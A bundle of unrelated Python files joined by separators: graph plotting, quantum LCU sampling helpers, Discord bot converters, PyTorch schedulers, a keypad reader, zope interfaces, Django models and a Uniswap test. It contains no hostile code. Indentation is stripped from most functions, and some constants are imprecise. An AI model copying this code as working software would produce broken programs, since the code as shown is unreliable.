xmax = max(x for x, y in pos.values())
for node in pos:
pos[node] = (pos[node][0] * width / xmax, pos[node][1])
return pos
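# Usage sketch (added for illustration): lay out a small directed balanced tree.
# `nx.balanced_tree` and root node 0 are just example inputs.
def _demo_hierarchy_pos():
    G = nx.balanced_tree(2, 2, create_using=nx.DiGraph)
    pos = hierarchy_pos(G, root=0)
    return pos  # dict mapping each node to an (x, y) position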
def construct_tree_graph(root, max_depth=np.inf):
tree_g = nx.DiGraph()
for node in anytree.PreOrderIter(root):
tree_g.add_node(node.id, n_reports=len(node.descendants) + 1, depth=node.depth)
for child in node.children:
tree_g.add_edge(node.id, child.id)
return tree_g
TreeplotResult = namedtuple("TreeplotResult", ["ax", "nodelist", "pos"])
def treeplot(
tree_g,
size_threshold=50,
layout="radial",
node_size_scale=5,
node_hue=None,
edge_hue=None,
figsize=(10, 10),
ax=None,
edge_linewidth=1,
node_palette=None,
edge_palette=None,
):
if ax is None:
_, ax = plt.subplots(1, 1, figsize=figsize)
big_nodes = [
x for x, y in tree_g.nodes(data=True) if y["n_reports"] >= size_threshold
]
big_tree_g = tree_g.subgraph(big_nodes)
nodelist = sorted(big_tree_g.nodes)
edgelist = sorted(big_tree_g.edges)
if layout == "radial":
pos = hierarchy_pos(big_tree_g, width=2 * math.pi, xcenter=0)
pos = {
u: (r * math.cos(theta), r * math.sin(theta))
for u, (theta, r) in pos.items()
}
elif layout == "vertical":
pos = hierarchy_pos(big_tree_g)
node_size = [
node_size_scale * (big_tree_g.nodes[node]["n_reports"] - 1) for node in nodelist
]
    if node_hue is not None:
        if node_hue == "id":
            node_hues = nodelist
        else:
            node_hues = [tree_g.nodes[n][node_hue] for n in nodelist]
        if node_palette is None:
            node_palette = dict(zip(np.unique(node_hues), sns.color_palette("tab10")))
        node_color = list(map(node_palette.__getitem__, node_hues))
    else:
        # Without a node hue there is nothing to map through a palette.
        node_color = "black"
    if edge_hue is not None:
        edge_hues = [tree_g.edges[u, v][edge_hue] for u, v in edgelist]
        edge_color = list(map(edge_palette.__getitem__, edge_hues))
    else:
        edge_color = "black"
nx.draw_networkx(
big_tree_g,
pos=pos,
with_labels=False,
nodelist=nodelist,
edgelist=edgelist,
node_size=node_size,
ax=ax,
arrows=False,
width=edge_linewidth,
node_color=node_color,
edge_color=edge_color,
)
soft_axis_off(ax)
ax.axis("square")
return TreeplotResult(ax, nodelist, pos)
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility methods for LCU circuits."""
import math
import numpy
def lambda_norm(diagonal_operator):
"""Computes the lambda norm relevant to LCU algorithms.
Args:
diagonal_operator: instance of DiagonalCoulombHamiltonian.
Returns:
lambda_norm: A float giving the lambda norm.
"""
lambda_norm = 0.
n_qubits = diagonal_operator.one_body.shape[0]
z_vector = numpy.zeros(n_qubits, float)
for p in range(n_qubits):
for q in range(n_qubits):
if p == q:
z_vector[p] -= diagonal_operator.one_body[p, p] / 2.
z_vector[p] -= diagonal_operator.two_body[p, p] / 2.
else:
lambda_norm += abs(diagonal_operator.one_body[p, q]) / 2.
lambda_norm += abs(diagonal_operator.two_body[p, q]) / 4.
z_vector[p] -= diagonal_operator.two_body[p, q] / 4.
z_vector[q] -= diagonal_operator.two_body[p, q] / 4.
lambda_norm += numpy.sum(numpy.absolute(z_vector))
return lambda_norm
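# Rough usage sketch (added for illustration): lambda_norm only reads the
# `one_body` and `two_body` matrices, so a tiny duck-typed stand-in for a
# DiagonalCoulombHamiltonian is enough to exercise it here; the matrices are
# made-up numbers.
class _FakeDiagonalOperator:
    def __init__(self, one_body, two_body):
        self.one_body = one_body
        self.two_body = two_body

def _demo_lambda_norm():
    one_body = numpy.array([[1.0, 0.5], [0.5, -1.0]])
    two_body = numpy.array([[0.0, 0.25], [0.25, 0.0]])
    return lambda_norm(_FakeDiagonalOperator(one_body, two_body))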
def _partial_sums(vals):
"""Adds up the items in the input, yielding partial sums along the way."""
total = 0
for v in vals:
yield total
total += v
yield total
def _differences(weights):
"""Iterates over the input yielding differences between adjacent items."""
previous_weight = None
have_previous_weight = False
for w in weights:
if have_previous_weight:
yield w - previous_weight
previous_weight = w
have_previous_weight = True
def _discretize_probability_distribution(unnormalized_probabilities, epsilon):
"""Approximates probabilities with integers over a common denominator.
Args:
unnormalized_probabilities: A list of non-negative floats proportional
to probabilities from a probability distribution. The numbers may
not be normalized (they do not have to add up to 1).
epsilon: The absolute error tolerance.
Returns:
numerators (list[int]): A list of numerators for each probability.
denominator (int): The common denominator to divide numerators by to
get probabilities.
sub_bit_precision (int): The exponent mu such that
denominator = n * 2**mu
where n = len(unnormalized_probabilities).
It is guaranteed that numerators[i] / denominator is within epsilon of
the i'th input probability (after normalization).
"""
n = len(unnormalized_probabilities)
sub_bit_precision = max(0, int(math.ceil(-math.log(epsilon * n, 2))))
bin_count = 2**sub_bit_precision * n
cumulative = list(_partial_sums(unnormalized_probabilities))
total = cumulative[-1]
discretized_cumulative = [int(math.floor(c / total * bin_count + 0.5))
for c in cumulative]
discretized = list(_differences(discretized_cumulative))
return discretized, bin_count, sub_bit_precision
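# Worked sketch (added for illustration): four unnormalized weights with an
# absolute tolerance of 0.01 give sub-bit precision 5, i.e. a common
# denominator of 4 * 2**5 = 128.
def _demo_discretize_probability_distribution():
    numerators, denominator, sub_bits = _discretize_probability_distribution(
        [0.1, 0.2, 0.3, 0.4], epsilon=0.01)
    assert denominator == 128 and sub_bits == 5
    assert sum(numerators) == denominator  # here numerators == [13, 25, 39, 51]
    return numerators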
def _preprocess_for_efficient_roulette_selection(discretized_probabilities):
"""Prepares data for performing efficient roulette selection.
The output is a tuple (alternates, keep_weights). The output is guaranteed
to satisfy a sampling-equivalence property. Specifically, the following
sampling process is guaranteed to be equivalent to simply picking index i
with probability weights[i] / sum(weights):
1. Pick a number i in [0, len(weights) - 1] uniformly at random.
    2. With probability keep_weights[i]*len(weights)/sum(weights), return i.
3. Otherwise return alternates[i].
In other words, the output makes it possible to perform roulette selection
while generating only two random numbers, doing a single lookup of the
relevant (keep_chance, alternate) pair, and doing one comparison. This is
not so useful classically, but in the context of a quantum computation
where all those things are expensive the second sampling process is far
superior.
Args:
discretized_probabilities: A list of probabilities approximated by
integer numerators (with an implied common denominator). In order
to operate without floating point error, it is required that the
sum of this list is a multiple of the number of items in the list.
Returns:
alternates (list[int]): An alternate index for each index from 0 to
len(weights) - 1
keep_weight (list[int]): Indicates how often one should stay at index i
instead of switching to alternates[i]. To get the actual keep
probability of the i'th element, multiply keep_weight[i] by
len(discretized_probabilities) then divide by
sum(discretized_probabilities).
"""
weights = list(discretized_probabilities) # Need a copy we can mutate.
if not weights:
raise ValueError('Empty input.')
n = len(weights)
target_weight = sum(weights) // n
if sum(weights) != n * target_weight:
raise ValueError('sum(weights) must be a multiple of len(weights).')
# Initially, every item's alternative is itself.
alternates = list(range(n))
keep_weights = [0] * n
# Scan for needy items and donors. First pass will handle all
# initially-needy items. Second pass will handle any remaining items that
# started as donors but become needy due to over-donation (though some may
# also be handled during the first pass).
donor_position = 0
for _ in range(2):
for i in range(n):
# Is this a needy item?
if weights[i] >= target_weight:
continue # Nope.
# Find a donor.
while weights[donor_position] <= target_weight:
donor_position += 1
# Donate.
donated = target_weight - weights[i]
weights[donor_position] -= donated
alternates[i] = donor_position
keep_weights[i] = weights[i]
# Needy item has been paired. Remove it from consideration.
weights[i] = target_weight
return alternates, keep_weights
def preprocess_lcu_coefficients_for_reversible_sampling(
lcu_coefficients, epsilon):
"""Prepares data used to perform efficient reversible roulette selection.
Treats the coefficients of unitaries in the linear combination of
unitaries decomposition of the Hamiltonian as probabilities in order to
decompose them into a list of alternate and keep numerators allowing for
an efficient preparation method of a state where the computational basis
    state :math:`|k>` has an amplitude proportional to the coefficient.
    It is guaranteed that the following sampling process will sample each
    index k with a probability within epsilon of
    lcu_coefficients[k] / sum(lcu_coefficients):
    1. Uniformly sample an index i from [0, len(lcu_coefficients) - 1].
    2. With probability keep_numers[i] / keep_denom, return i, where
       keep_denom = 2**sub_bit_precision.
3. Otherwise return alternates[i].
Args:
lcu_coefficients: A list of non-negative floats, with the i'th float
corresponding to the i'th coefficient of an LCU decomposition
of the Hamiltonian (in an ordering determined by the caller).
epsilon: Absolute error tolerance.
Returns:
alternates (list[int]): A python list of ints indicating alternative
indices that may be switched to after generating a uniform index.
The int at offset k is the alternate to use when the initial index
is k.
keep_numers (list[int]): A python list of ints indicating the
numerators of the probability that the alternative index should be
used instead of the initial index.
sub_bit_precision (int): A python int indicating the exponent of the
denominator to divide the items in keep_numers by in order to get
a probability. The actual denominator is 2**sub_bit_precision.
"""
numers, denom, sub_bit_precision = _discretize_probability_distribution(
lcu_coefficients, epsilon)
assert denom == 2**sub_bit_precision * len(numers)
alternates, keep_numers = _preprocess_for_efficient_roulette_selection(
numers)
return alternates, keep_numers, sub_bit_precision
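# End-to-end sketch (added for illustration): the sampling guarantee above can
# be checked directly for a small coefficient list by reconstructing the
# distribution implied by (alternates, keep_numers).
def _demo_preprocess_lcu_coefficients():
    alternates, keep_numers, sub_bit_precision = (
        preprocess_lcu_coefficients_for_reversible_sampling(
            [0.1, 0.2, 0.3, 0.4], epsilon=0.01))
    keep_denom = 2**sub_bit_precision
    n = len(alternates)
    probabilities = [keep_numers[i] / (n * keep_denom) for i in range(n)]
    for i in range(n):
        probabilities[alternates[i]] += (keep_denom - keep_numers[i]) / (n * keep_denom)
    return probabilities  # each entry lies within 0.01 of [0.1, 0.2, 0.3, 0.4]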
|
from .default import *
from .abc import ABCRule
|
"""
Contains constants with informative error messages
"""
MALFORMED_JSON = 'Malformed JSON sent with request. Make sure you include something' \
' like the following in the request body: {"name": "playernametovalidate"}'
INVALID_NAME = 'This name is invalid. Please pick a name that is exclusively made up of' \
' alphanumeric characters (no spaces or special characters).' |
import datetime
from typing import Optional, Literal
import discord
import re
from discord.ext import commands, menus
__all__ = [
"CannotPunish",
"embed_create",
"TimeConverter",
"IntentionalUser",
"IntentionalMember",
"CustomMenu",
"user_friendly_dt"
]
class CannotPunish(commands.CommandError):
def __init__(self, punishment: str, users: [discord.Member, discord.User], mod: discord.Member):
self.punish = punishment
self.users = users
self.ctx = mod
def embed_create(user, **kwargs):
color = kwargs.get('color', 0x46ff2e)
title = kwargs.get('title', discord.embeds.EmptyEmbed)
url = kwargs.get('url', discord.embeds.EmptyEmbed)
description = kwargs.get('description', discord.embeds.EmptyEmbed)
embed = discord.Embed(description=description, title=title, color=color, url=url)
embed.set_footer(
text=f'Command sent by {user}',
icon_url=user.avatar_url,
)
return embed
class Time(object):
def __init__(self, unit_name, unit_time, amount_units, total_seconds):
self.unit_name = unit_name
self.unit_time = unit_time
self.amount_units = amount_units
self.total_seconds = total_seconds
class TimeConverter(commands.Converter):
@staticmethod
def unit_getter(unit):
if unit in ["s", "sec", "secs", "second", "seconds"]:
return 1, "second"
if unit in ["m", "min", "mins", "minute", "minutes"]:
return 60, "minute"
if unit in ["h", "hr", "hrs", "hour", "hours"]:
return 3600, "hour"
if unit in ["d", "day", "days"]:
            return 86_400, "day"
if unit in ["w", "wk", "wks", "week", "weeks"]:
return 604_800, "week"
if unit in ["mth", "mths", "mos", "month", "months"]:
return 2_580_000, "month"
if unit in ["y", "yr", "yrs", "year", "years"]:
            return 31_390_000, "year"
else:
return None, None
    async def convert(self, ctx, argument):
        reg = re.compile("([0-9]+)([a-zA-Z]+)")
        amount, unit = reg.match(argument).groups()
        amount = int(amount)
        unit_time, unit_name = self.unit_getter(unit.lower())
        seconds = unit_time * amount
        return Time(unit_name, unit_time, amount, seconds)
class IntentionalMember(commands.converter.MemberConverter):
async def query_member_named(self, guild, argument):
cache = guild._state.member_cache_flags.joined
if len(argument) > 5 and argument[-5] == '#':
username, _, discriminator = argument.rpartition('#')
members = await guild.query_members(username, limit=100, cache=cache)
return discord.utils.get(members, name=username, discriminator=discriminator)
else:
return None
async def convert(self, ctx, argument: str) -> discord.Member:
bot = ctx.bot
match = self._get_id_match(argument) or re.match(r'<@!?([0-9]{15,20})>$', argument)
guild = ctx.guild
user_id = None
if match is None:
# not a mention...
if guild:
result = await self.query_member_named(guild, argument)
else:
result = commands.converter._get_from_guilds(bot, 'get_member_named', argument)
else:
user_id = int(match.group(1))
if guild:
result = guild.get_member(user_id) or discord.utils.get(ctx.message.mentions, id=user_id)
else:
result = commands.converter._get_from_guilds(bot, 'get_member', user_id)
if result is None:
if guild is None:
raise commands.errors.MemberNotFound(argument)
if user_id is not None:
result = await self.query_member_by_id(bot, guild, user_id)
else:
result = await self.query_member_named(guild, argument)
if not result:
raise commands.errors.MemberNotFound(argument)
return result
class IntentionalUser(commands.converter.UserConverter):
async def convert(self, ctx: commands.Context, argument: str) -> discord.User:
match = self._get_id_match(argument) or re.match(r'<@!?([0-9]{15,20})>$', argument)
state = ctx._state
if match is not None:
user_id = int(match.group(1))
result = ctx.bot.get_user(user_id) or discord.utils.get(ctx.message.mentions, id=user_id)
if result is None:
try:
result = await ctx.bot.fetch_user(user_id)
except discord.HTTPException:
raise commands.errors.UserNotFound(argument) from None
return result
arg = argument
# Remove the '@' character if this is the first character from the argument
if arg[0] == '@':
# Remove first character
arg = arg[1:]
# check for discriminator if it exists,
if len(arg) > 5 and arg[-5] == '#':
discrim = arg[-4:]
name = arg[:-5]
predicate = lambda u: u.name == name and u.discriminator == discrim
result = discord.utils.find(predicate, state._users.values())
if result is not None:
return result
raise commands.errors.UserNotFound(argument)
class CustomMenu(menus.MenuPages):
@menus.button('\N{WASTEBASKET}\ufe0f', position=menus.Last(3))
async def do_trash(self, _):
self.stop()
await self.message.delete()
def stop(self):
self.call_end_event()
super().stop()
async def finalize(self, timed_out):
self.call_end_event()
def call_end_event(self):
self.bot.dispatch('finalize_menu', self.ctx)
TimestampStyle = Literal['f', 'F', 'd', 'D', 't', 'T', 'R']
def format_dt(dt: datetime.datetime, /, style: Optional[TimestampStyle] = None) -> str:
if style is None: return f'<t:{int(dt.timestamp())}>'
return f'<t:{int(dt.timestamp())}:{style}>'
def user_friendly_dt(dt: datetime.datetime):
return format_dt(dt, style='f') + f' ({format_dt(dt, style="R")})'
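# Illustrative sketch (not part of the original cog): what the timestamp
# helpers above emit. The datetime value is an arbitrary assumption; the
# exact epoch number depends on the local timezone.
if __name__ == '__main__':
    example = datetime.datetime(2021, 6, 1, 12, 0)
    print(format_dt(example))          # e.g. '<t:1622548800>'
    print(user_friendly_dt(example))   # e.g. '<t:1622548800:f> (<t:1622548800:R>)'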
|
import torch.optim as optim
def get_optimizer(parameters, optim_args):
"""Get a PyTorch optimizer for params.
Args:
parameters: Iterator of network parameters to optimize (i.e., model.parameters()).
optim_args: Command line arguments.
Returns:
PyTorch optimizer specified by args_.
"""
if optim_args.optimizer == 'sgd':
optimizer = optim.SGD(parameters, optim_args.lr,
momentum=optim_args.sgd_momentum,
weight_decay=optim_args.weight_decay,
dampening=optim_args.sgd_dampening)
elif optim_args.optimizer == 'adam':
optimizer = optim.Adam(parameters, optim_args.lr,
betas=(optim_args.adam_beta_1, optim_args.adam_beta_2), weight_decay=optim_args.weight_decay)
else:
raise ValueError('Unsupported optimizer: {}'.format(optim_args.optimizer))
return optimizer
def get_scheduler(optimizer, optim_args):
"""Get a learning rate scheduler.
Args:
optimizer: The optimizer whose learning rate is modified by the returned scheduler.
        optim_args: Command line arguments.
    Returns:
        PyTorch scheduler that updates the learning rate for `optimizer`.
"""
if optim_args.lr_scheduler is None:
scheduler = None
elif optim_args.lr_scheduler == 'step':
scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=optim_args.lr_decay_step, gamma=optim_args.lr_decay_gamma)
elif optim_args.lr_scheduler == 'multi_step':
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=optim_args.lr_milestones, gamma=optim_args.lr_decay_gamma)
elif optim_args.lr_scheduler == 'plateau':
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer,
factor=optim_args.lr_decay_gamma,
patience=optim_args.lr_patience,
min_lr=[pg['lr'] * 1e-3 for pg in optimizer.param_groups])
else:
        raise ValueError('Invalid learning rate scheduler: {}.'.format(optim_args.lr_scheduler))
return scheduler
def step_scheduler(lr_scheduler, metrics, lr_step, best_ckpt_metric='stanford-valid_loss'):
"""Step a LR scheduler.
Args:
lr_scheduler: Scheduler to step.
metrics: Dictionary of metrics.
lr_step: Number of times step_scheduler has been called.
best_ckpt_metric: Name of metric to use to determine the best checkpoint.
"""
if lr_scheduler is not None:
lr_step += 1
if isinstance(lr_scheduler, optim.lr_scheduler.ReduceLROnPlateau):
if best_ckpt_metric in metrics:
lr_scheduler.step(metrics[best_ckpt_metric], epoch=lr_step)
else:
raise ValueError(f"Chose {best_ckpt_metric} metric which is not in metrics.")
else:
lr_scheduler.step(epoch=lr_step)
return lr_step
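# Illustrative sketch (not part of the original module): the attributes that
# `optim_args` is expected to carry, using types.SimpleNamespace in place of
# parsed command line arguments. Every value below is an assumption.
if __name__ == '__main__':
    from types import SimpleNamespace
    import torch.nn as nn

    model = nn.Linear(4, 2)
    optim_args = SimpleNamespace(
        optimizer='sgd', lr=0.01, sgd_momentum=0.9, sgd_dampening=0.0,
        weight_decay=1e-4, lr_scheduler='step', lr_decay_step=10,
        lr_decay_gamma=0.1)
    optimizer = get_optimizer(model.parameters(), optim_args)
    scheduler = get_scheduler(optimizer, optim_args)
    print(type(optimizer).__name__, type(scheduler).__name__)  # SGD StepLR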
|
from gpiozero import MCP3008
from time import sleep
# Class
class PinPad:
# initialisation of class
def __init__(self, pin_digit_count=4, max_voltage=3.3):
self.pin_digit_count = pin_digit_count
self.max_voltage = max_voltage
self.keypad_adc_row_list = []
self.invalid_pin_digits = ['A', 'B', 'C', 'D', '*', '#']
self.keypad_matrix = [['1', '2', '3', 'A'],
['4', '5', '6', 'B'],
['7', '8', '9', 'C'],
['*', '0', '#', 'D']]
# setup MCP3008 instance for each pin pad row (left column 0.25 * VDD, right column 1 * VDD)
for row in range(4):
self.keypad_adc_row_list.append(MCP3008(max_voltage=self.max_voltage, channel=row))
# close MCP3008 instances
def close(self):
for row in range(4):
self.keypad_adc_row_list[row].close()
# get state of key
# returns true if given key has been pressed, false otherwise
def is_key_pressed(self, key, debug=False):
key_state = False
row = 0
for row_digit_list in self.keypad_matrix: # loop through rows
if key in row_digit_list:
column = row_digit_list.index(key) # get column if key exists in pin pad row
break
row += 1 # increment for next row list,
row_level = self.keypad_adc_row_list[row].value
# if voltage level of row matches column
if row_level > ((column + 1) * 0.2) and row_level < ((column + 2) * 0.2):
if debug:
print(key, row + 1, column + 1, row_level)
key_state = True
sleep(0.5)
return key_state
# get pressed key
# returns pressed key
def get_key(self, debug=False):
key = ""
        # loop through each row and read its voltage level to determine the column
for row in range(len(self.keypad_adc_row_list)):
column = 0
row_level = self.keypad_adc_row_list[row].value
            if row_level > 0.2: # voltage divider at 0.25 * VDD
                column += 1
            if row_level > 0.4: # voltage divider at 0.5 * VDD
                column += 1
            if row_level > 0.6: # voltage divider at 0.75 * VDD
                column += 1
            if row_level > 0.8: # voltage divider at 1 * VDD
column += 1
if column > 0: # 0 means no key found. Array index starts at 0. To access array, decrement column.
key = self.keypad_matrix[row][column - 1] # get key from matrix
if debug:
print(key, row_level)
sleep(0.5) # simple debouncing
return key # return pressed key
# get pin
# returns entered pin
def get_pin(self, debug=False):
pin = ""
digit_count = 0
while digit_count < self.pin_digit_count: # loop until all keys have been entered
key = self.get_key(debug) # get pressed key
            if key == '*': # if * pressed, cancel pin input procedure
pin = ""
break
if key in self.invalid_pin_digits: # allow only numerical keys
key = ""
if key: # if key pressed, add digit to pin string
digit_count += 1
pin = pin + key
return pin # return pin string
# main as example, will be ignored if imported as library
if __name__ == "__main__":
expected_pin = "1234"
entered_pin = ""
try:
pin_pad = PinPad()
print("Enter * to continue...")
while True:
if pin_pad.is_key_pressed('*'):
break
while True:
print("Enter pin:")
entered_pin = pin_pad.get_pin(debug=True)
print(entered_pin)
if expected_pin == entered_pin:
break
except KeyboardInterrupt:
pass
pin_pad.close()
print("Program exit.")
|
##############################################################################
# Copyright (c) 2020 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
##############################################################################
"""
Interface definitions for builtin types.
After this module is imported, the standard library types will declare
that they implement the appropriate interface.
.. versionadded:: 5.0.0
"""
from __future__ import absolute_import
from zope.interface import classImplements
from zope.interface.common import collections
from zope.interface.common import numbers
from zope.interface.common import io
__all__ = [
'IList',
'ITuple',
'ITextString',
'IByteString',
'INativeString',
'IBool',
'IDict',
'IFile',
]
# pylint:disable=no-self-argument
class IList(collections.IMutableSequence):
"""
Interface for :class:`list`
"""
extra_classes = (list,)
def sort(key=None, reverse=False):
"""
Sort the list in place and return None.
*key* and *reverse* must be passed by name only.
"""
class ITuple(collections.ISequence):
"""
Interface for :class:`tuple`
"""
extra_classes = (tuple,)
class ITextString(collections.ISequence):
"""
Interface for text (unicode) strings.
On Python 2, this is :class:`unicode`. On Python 3,
this is :class:`str`
"""
extra_classes = (type(u'unicode'),)
class IByteString(collections.IByteString):
"""
Interface for immutable byte strings.
On all Python versions this is :class:`bytes`.
Unlike :class:`zope.interface.common.collections.IByteString`
(the parent of this interface) this does *not* include
:class:`bytearray`.
"""
extra_classes = (bytes,)
class INativeString(IByteString if str is bytes else ITextString):
"""
Interface for native strings.
On all Python versions, this is :class:`str`. On Python 2,
this extends :class:`IByteString`, while on Python 3 it extends
:class:`ITextString`.
"""
# We're not extending ABCInterface so extra_classes won't work
classImplements(str, INativeString)
class IBool(numbers.IIntegral):
"""
Interface for :class:`bool`
"""
extra_classes = (bool,)
class IDict(collections.IMutableMapping):
"""
Interface for :class:`dict`
"""
extra_classes = (dict,)
class IFile(io.IIOBase):
"""
Interface for :class:`file`.
It is recommended to use the interfaces from :mod:`zope.interface.common.io`
instead of this interface.
On Python 3, there is no single implementation of this interface;
depending on the arguments, the :func:`open` builtin can return
many different classes that implement different interfaces from
:mod:`zope.interface.common.io`.
"""
try:
extra_classes = (file,)
except NameError:
extra_classes = ()
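# Illustrative sketch (not part of the original module): once this module has
# been imported, the builtin types report that they provide the interfaces
# declared above.
if __name__ == '__main__':
    print(IList.providedBy([1, 2, 3]))       # expected: True
    print(IDict.providedBy({}))              # expected: True
    print(INativeString.providedBy('text'))  # expected: True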
|
import numpy as np
import torch
from PIL import Image
def imcascade(*imgs, savepath=None):
# imgs -- multiple pytorch tensors or numpy tensors
# pick the image which is the smallest, and resize the others to match it (can be arbitrary image shape here)
assert(isinstance(imgs[0], (np.ndarray, torch.Tensor)))
if torch.is_tensor(imgs[0]):
imgs = list(map(lambda x: x.cpu().numpy(), imgs))
if isinstance(imgs[0], np.ndarray):
imgs = [Image.fromarray(x.astype(np.uint8)) for x in imgs]
min_shape = sorted([(np.sum(i.size), i.size) for i in imgs])[0][1]
    imgs_comb = np.hstack([np.asarray(i.resize(min_shape).convert('L')) for i in imgs])
imgs_comb = Image.fromarray(imgs_comb.astype(np.uint8))
if savepath:
imgs_comb.save(savepath)
return imgs_comb
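# Illustrative sketch (not part of the original module): cascading two
# synthetic grayscale images; the shapes and pixel values are assumptions.
if __name__ == '__main__':
    a = np.zeros((32, 32))
    b = np.full((64, 64), 255.0)
    combined = imcascade(a, b)  # every tile is resized to the smallest image
    print(combined.size)        # expected: (64, 32), i.e. two 32x32 tiles side by side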
|
from .analyzer import AnomalyAnalyzer
from .manager import AnomalyManager
from .storage import AnomalyStorage
from .generalanomaly import GeneralAnomaly
__all__ = (
'AnomalyAnalyzer',
'AnomalyManager',
'AnomalyStorage',
'GeneralAnomaly',
)
|
from django.conf.urls import patterns, url, include
from .views.staffing import (change_staffing_acl, change_staffing_acl_vendors,
search_vendors_and_people)
from .views.projects import (create_proposed_resource, delete_proposed_resource, edit_proposed_resource,
change_proposed_status, proposed_resource_details, remove_proposed_resource)
urlpatterns = patterns('projects.views',
url(r'^search/$', search_vendors_and_people, name='search'),
url('(?P<request_pk>\d+)/propose/$', create_proposed_resource,
name='propose'),
url('(?P<request_pk>\d+)/acl/$', change_staffing_acl,
name='change_acl'),
url('(?P<request_pk>\d+)/acl/vendors/$', change_staffing_acl_vendors,
name='change_acl_vendors'),
url('proposed/(?P<pk>\d+)/delete/$', delete_proposed_resource,
name='delete_proposed_resource'),
url('proposed/(?P<pk>\d+)/edit/$', edit_proposed_resource,
name='edit_proposed'),
url(r'^proposed/(?P<pk>\d+)/status/$',
change_proposed_status,
name='change_proposed_status'
),
url('proposed/(?P<pk>\d+)/$', proposed_resource_details,
name='proposed_resource_details'
),
url('proposed/(?P<pk>\d+)/remove/$', remove_proposed_resource,
name='remove_proposed_resource'
),
url(r'^r/', include('projects.requests_urls',
namespace='requests')),
)
|
from ..models import Record
from .base import BaseRepository
class RecordsRepository(BaseRepository):
__model__ = Record
|
import pytest
from brownie import interface
import brownie
def setup_uniswap(admin, alice, bank, werc20, urouter, ufactory, celo, cusd, ceur, chain, UniswapV2Oracle, UniswapV2SpellV1, simple_oracle, core_oracle, oracle):
spell = UniswapV2SpellV1.deploy(bank, werc20, urouter, celo, {'from': admin})
cusd.mint(admin, 10000000 * 10**6, {'from': admin})
ceur.mint(admin, 10000000 * 10**6, {'from': admin})
cusd.approve(urouter, 2**256-1, {'from': admin})
ceur.approve(urouter, 2**256-1, {'from': admin})
urouter.addLiquidity(
cusd,
ceur,
1000000 * 10**6,
1000000 * 10**6,
0,
0,
admin,
2**256-1,
{'from': admin},
)
lp = ufactory.getPair(cusd, ceur)
print('admin lp bal', interface.IERC20(lp).balanceOf(admin))
uniswap_lp_oracle = UniswapV2Oracle.deploy(core_oracle, {'from': admin})
print('ceur Px', simple_oracle.getCELOPx(ceur))
print('cusd Px', simple_oracle.getCELOPx(cusd))
core_oracle.setRoute([cusd, ceur, lp], [simple_oracle, simple_oracle,
uniswap_lp_oracle], {'from': admin})
print('lp Px', uniswap_lp_oracle.getCELOPx(lp))
oracle.setTokenFactors(
[cusd, ceur, lp],
[
[10000, 10000, 10000],
[10000, 10000, 10000],
[10000, 10000, 10000],
],
{'from': admin},
)
cusd.mint(alice, 10000000 * 10**6, {'from': admin})
ceur.mint(alice, 10000000 * 10**6, {'from': admin})
cusd.approve(bank, 2**256-1, {'from': alice})
ceur.approve(bank, 2**256-1, {'from': alice})
return spell
def execute_uniswap_werc20(admin, alice, bank, token0, token1, spell, ufactory, pos_id=0):
spell.getAndApprovePair(token0, token1, {'from': admin})
lp = ufactory.getPair(token0, token1)
spell.setWhitelistLPTokens([lp], [True], {'from': admin})
bank.setWhitelistSpells([spell], [True], {'from': admin})
bank.setWhitelistTokens([token0, token1], [True, True], {'from': admin})
tx = bank.execute(
pos_id,
spell,
spell.addLiquidityWERC20.encode_input(
token0, # token 0
token1, # token 1
[
40000 * 10**6, # 40000 ceur
50000 * 10**6, # 50000 cusd
0,
1000 * 10**6, # 1000 ceur
200 * 10**6, # 200 cusd
0, # borrow LP tokens
0, # min ceur
0, # min cusd
],
),
{'from': alice}
)
|
from django.contrib import admin
from .models import CustomerReportTemplate
class CustomerReportTemplateAdmin(admin.ModelAdmin):
search_fields = [
'template_name',
]
list_display = [
'template_name',
'customer_id'
]
admin.site.register(CustomerReportTemplate, CustomerReportTemplateAdmin)
|
#coding: utf-8
from django.db import models
# Create your models here.
class IDC(models.Model):
name = models.CharField(max_length=20, verbose_name=u'机房名称')
type = models.CharField(max_length=10, verbose_name=u'机房类型')
ips = models.CharField(max_length=60, verbose_name=u'公网IP地址')
address = models.CharField(max_length=60, verbose_name=u'机房地址')
contact = models.CharField(max_length=40, verbose_name=u'联系方式')
def __unicode__(self):
return self.name
class Meta:
verbose_name = u'机房列表'
verbose_name_plural = u'机房列表'
class Server(models.Model):
name = models.CharField(max_length=30, verbose_name=u'名称')
ip = models.GenericIPAddressField(unique=True, verbose_name=u'IP地址')
brand = models.CharField(max_length=30, verbose_name=u'品牌')
model = models.CharField(max_length=30, verbose_name=u'型号')
sn = models.CharField(max_length=30, verbose_name=u'序列号')
location = models.CharField(max_length=30, verbose_name=u'机架位置')
system = models.CharField(max_length=30, verbose_name=u'系统环境')
idc_name = models.ForeignKey(IDC,verbose_name=u'所属机房')
def __unicode__(self):
return self.name
class Meta:
verbose_name = u'服务器列表'
verbose_name_plural = u'服务器列表'
class Host(models.Model):
name = models.CharField(max_length=30, verbose_name=u'主机名')
ip = models.GenericIPAddressField(unique=True, verbose_name=u'IP地址')
group = models.ManyToManyField('Group',blank=True ,verbose_name=u'所属组')
app = models.CharField(max_length=20, verbose_name=u'功能说明')
    status = models.BooleanField(default=True, verbose_name=u'使用状态')
server_name = models.ForeignKey(Server, verbose_name=u'所属服务器')
def __unicode__(self):
return self.name
class Meta:
verbose_name = u'主机列表'
verbose_name_plural = u'主机列表'
class Group(models.Model):
name = models.CharField(max_length=30,unique=True)
def __unicode__(self):
return self.name
class Meta:
verbose_name = u'主机组信息'
verbose_name_plural = u'主机组列表'
class Host_Detail(models.Model):
